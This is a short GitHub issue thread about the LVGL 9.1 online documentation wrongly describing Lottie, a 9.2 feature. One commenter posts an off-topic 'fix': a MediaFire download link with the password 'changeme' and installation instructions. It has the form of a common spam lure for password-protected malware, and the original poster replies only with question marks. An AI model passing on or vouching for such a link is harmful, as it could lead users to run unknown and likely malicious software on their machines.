lvgl/lvgl #6742: The content of the document at https://docs.lvgl.io/9.1/ is not for version 9.1

lhdjply, 2024-08-27:
### Introduce the problem

[image]

As shown in the figure, for example, Lottie was added in version 9.2, but it is also mentioned in the 9.1 documentation.

@ki

lhdjply, 2024-08-27:
@kisvegabor

NikhilKumar77777, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

lhdjply, 2024-08-27:
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."
 

?????????????

closed 2024-08-29 by kisvegabor